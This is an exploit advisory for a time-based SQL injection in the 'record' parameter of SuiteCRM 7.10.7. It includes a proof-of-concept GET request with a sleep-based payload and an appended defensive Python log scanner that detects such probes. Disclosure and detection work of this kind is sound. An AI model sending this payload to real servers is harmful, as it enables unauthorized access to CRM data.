"SuiteCRM 7.10.7 - 'record' SQL Injection"

Author

"Mehmet EMIROGLU"

Platform

php

Release date

2019-02-04


####################################################################

# Exploit Title: SuiteCRM 7.10.7 - 'record' SQL Vulnerabilities
# Dork: N/A
# Date: 03-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://suitecrm.com/
# Software Link: https://suitecrm.com/download/
# Version: 7.10.7
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
# Software Description: SuiteCRM was awarded the 2015 BOSSIE by InfoWorld
#   as the world's best open source Customer Relationship Management (CRM)
#   application.

####################################################################

# Vulnerabilities
# The affected web application is SuiteCRM version 7.10.7.
# After logging in, go to the user section and view the user details,
# then append the following code to the end of the URL.

####################################################################

# POC - SQL (Time Based)
# Parameters : record
# Attack Pattern : aNd if(length(0x454d49524f474c55)>1,sleep(5),0)
# GET Request :
http://localhost/SuiteCRM/index.php?module=Users&action=DetailView&record=1
aNd if(length(0x454d49524f474c55)>1,sleep(5),0)

####################################################################
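
Added example (not part of the original advisory): a log check a defender could run for the request pattern above. It flags `record` values that are not a plain id and notes whether the response was delayed; the id format, the duration field at the end of each log line, and the 3-second threshold are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate record id is a short token such as "1" or a
# 36-character GUID; anything else in this parameter deserves a look.
RECORD_ID = re.compile(r"[A-Za-z0-9_-]{1,36}")
# MySQL functions typically used to inject a delay.
TIMING_CALL = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/\d(?:\.\d)?"')
# Assumption: a response slower than this (microseconds) counts as delayed.
SLOW_US = 3_000_000

# Constructed sample: Apache combined-style lines with the request
# duration in microseconds (%D) appended as the last field.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Feb/2019:10:00:01 +0000] "GET /SuiteCRM/index.php'
    '?module=Users&action=DetailView&record=1 HTTP/1.1" 200 5120 84211',
    '192.0.2.10 - - [04/Feb/2019:10:00:09 +0000] "GET /SuiteCRM/index.php'
    '?module=Users&action=DetailView&record=1%20aNd%20if(length('
    '0x454d49524f474c55)%3E1,sleep(5),0) HTTP/1.1" 200 5120 5093400',
    '198.51.100.7 - - [04/Feb/2019:10:02:30 +0000] "GET /SuiteCRM/index.php'
    '?module=Users&action=DetailView&record=1%27 HTTP/1.1" 200 4800 90122',
]


def classify_record(value):
    """Return 'ok', 'timing-probe' or 'malformed' for a decoded record value."""
    if RECORD_ID.fullmatch(value):
        return "ok"
    if TIMING_CALL.search(value):
        return "timing-probe"
    return "malformed"


def scan(lines):
    """Return (line_no, client, verdict, delayed) for each suspicious request."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        # parse_qs URL-decodes the value, so %20 and %3E are compared as
        # the space and '>' the database would have received.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        last_field = line.rsplit(None, 1)[-1]
        duration = int(last_field) if last_field.isdigit() else None
        delayed = duration is not None and duration >= SLOW_US
        for value in query.get("record", []):
            verdict = classify_record(value)
            if verdict != "ok":
                findings.append((line_no, line.split()[0], verdict, delayed))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A flagged request whose response was also delayed suggests the injected expression was evaluated by the database, so that host should be prioritised for patching and review.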